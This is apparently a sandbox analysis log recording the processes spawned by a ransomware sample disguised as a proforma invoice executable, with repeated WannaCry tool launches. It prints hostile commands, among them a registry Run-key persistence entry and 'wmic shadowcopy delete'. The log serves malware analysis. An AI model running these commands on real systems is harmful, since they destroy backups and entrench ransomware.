            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe coJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vsJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /fJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vsJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
